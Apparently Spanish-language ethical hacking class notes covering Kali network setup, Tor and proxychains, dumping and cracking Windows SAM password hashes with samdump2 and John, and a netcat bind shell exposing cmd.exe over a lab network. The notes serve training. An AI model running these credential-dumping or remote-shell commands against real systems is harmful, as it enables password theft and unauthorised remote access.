You are on page 1of 14

INSTALAR KALI LINUX

ifconfig
ifconfig eth0
ifconfig eth0 192.168.14.110 netmask 255.255.255.0
(ping 192.168.14.1)
route add default gw 192.168.14.1
(route)
echo nameserver 200.48.0.37 > /etc/resolv.conf
(ping www.google.com)

vi cibertec_ip.sh
#!/bin/bash
ifconfig eth0 192.168.14.110 netmask 255.255.255.0
route add default gw 192.168.14.1
echo nameserver 200.48.0.37 > /etc/resolv.conf
chmod +x cibertec_ip.sh

vi /etc/network/interfaces
auto eth0
iface eth0 inet static
address 192.168.14.113
netmask 255.255.255.0
gateway 192.168.14.1
(:wq)
vi /etc/resolv.conf
Nameserver 200.48.0.37
(:wq)
/etc/init.d/networking restart
ifconfig eth0 up

GUIA DE LINUX

apt-get install tor


apt-get install vidalia

wget http://192.168.14.100/cb/proxychains3.1.tar.gz
compilar proxychains:
tar zxvf proxychains-3.1.tar.gz
cd proxychains-3.1
./configure
make
make install

WINDOWS/system32/config/system
WINDOWS/system32/config/SAM
cd Desktop
wget http://192.168.14.100/cb/system
wget http://192.168.14.100/cb/SAM
bkhive system syskey.txt
samdump2 SAM syskey.txt > hashes.txt
cat hashes.txt
john hashes.txt --format=nt2
john hashes.txt --format=nt2 show
http://objectif-securite.ch/en/ophcrack.php

service ssh status


service ssh start
ssh root@192.168.14.52

al servidor
scp OWASP.pdf root@192.168.14.52:/root/Desktop
scp -r viajealsur/ tomas@bootlog.cl:/www/sitio/fotos
del servidor
scp root@192.168.14.52:/root/Desktop/prueba.txt /root/
scp -r tomas@bootlog.cl:/www/sitio/fotos/viajealsur /root/

Localicen el archivo nc.exe en su kali

locate nc.exe
find / | grep nc.exe
Copien el archivo nc.exe a su windows (1 punto!)

smbclient
smbclient -U Ethical-Sab -L 192.168.14.xx
smbclient -U Ethical-Sab '\\192.168.14.xx\Ethical-Sab'
put nc.exe

nc -lp 4444 (windows)


nc -v 172.16.89.130 4444 (bactrack)
nc 192.168.1.1 80
GET / HTTP/1.0
(conectividad con puertos!)
nc -lp 4444 -e cmd.exe (windows)
nc -v 172.16.89.130 4444

You might also like